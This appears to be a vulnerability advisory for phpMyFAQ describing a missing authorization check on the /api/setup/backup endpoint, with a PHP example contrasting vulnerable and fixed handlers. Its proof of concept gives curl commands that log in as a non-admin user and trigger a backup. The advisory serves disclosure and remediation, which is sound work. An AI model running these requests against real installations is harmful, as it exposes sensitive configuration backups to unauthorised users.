Improper authorization control for web services in phpmyfaq/phpmyfaq

Description

phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing)

Summary

Authenticated non‑admin users can call /api/setup/backup and trigger a configuration backup. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP.

Details

SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged‑in user to create a sensitive backup and retrieve its path.
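As an added illustration of the gap described above (example code written for this page, not phpMyFAQ's own SetupController; the User, Response and permission names are hypothetical stand-ins), the authentication-only handler is shown beside a handler that also enforces a permission check for the backup action and logs the denied attempt:

```php
<?php
// Added example, not phpMyFAQ code. Models the authz gap in the advisory:
// a backup endpoint that only checks authentication versus one that also
// checks a configuration permission. Class, method and permission names
// are hypothetical; the backup path is a constructed placeholder.
declare(strict_types=1);

final class User
{
    /** @param string[] $permissions constructed permission names for this example */
    public function __construct(
        public readonly string $login,
        public readonly bool $authenticated,
        public readonly array $permissions = [],
    ) {}

    public function hasPermission(string $permission): bool
    {
        return $this->authenticated && in_array($permission, $this->permissions, true);
    }
}

final class Response
{
    public function __construct(public readonly int $status, public readonly string $body) {}
}

// Vulnerable shape: authentication only, which is what the advisory describes.
function backupAuthOnly(User $user): Response
{
    if (!$user->authenticated) {
        return new Response(401, 'Unauthorized');
    }
    // Any logged-in user reaches this point and receives the backup location.
    return new Response(200, '{"backup":"/path/to/backup.zip"}');
}

// Hardened shape: authentication AND a permission tied to the action.
function backupWithAuthz(User $user): Response
{
    if (!$user->authenticated) {
        return new Response(401, 'Unauthorized');
    }
    // 'configuration' is a constructed permission name for this example.
    if (!$user->hasPermission('configuration')) {
        // Record the denied call; repeated denials for one account are a useful alert signal.
        error_log(sprintf('backup denied for user=%s', $user->login));
        return new Response(403, 'Forbidden');
    }
    return new Response(200, '{"backup":"/path/to/backup.zip"}');
}

// Constructed users: an anonymous caller, a logged-in non-admin, and an admin.
$anon   = new User('anonymous', false);
$tester = new User('tester', true);
$admin  = new User('admin', true, ['configuration']);

foreach (['backupAuthOnly', 'backupWithAuthz'] as $handler) {
    foreach ([$anon, $tester, $admin] as $user) {
        $r = $handler($user);
        printf("%-16s %-10s -> %d %s\n", $handler, $user->login, $r->status, $r->body);
    }
}
```

Running the script shows the difference in one place: with `backupAuthOnly` the non-admin `tester` receives a 200 and the backup location, while with `backupWithAuthz` the same user receives a 403 and only `admin` gets through. The fix is to gate the action on a permission the caller must hold, not merely on having a session.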

PoC

Precondition: API enabled, any authenticated non‑admin user.

    1. Log in as a non‑admin user.

    2. Call the backup endpoint.

curl -c /tmp/pmf_api_cookies.txt \
  -H 'Content-Type: application/json' \
  -d '{"username":"tester","password":"Test1234!"}' \
  http://192.168.40.16/phpmyfaq/api/v3.0/login

curl -i -b /tmp/pmf_api_cookies.txt \
  -X POST --data '4.0.16' \
  http://192.168.40.16/phpmyfaq/api/setup/backup...

Impact

Low‑privileged users can generate sensitive backups. If the ZIP is web‑accessible (server misconfiguration), this can lead to secret exposure.

Mitigation
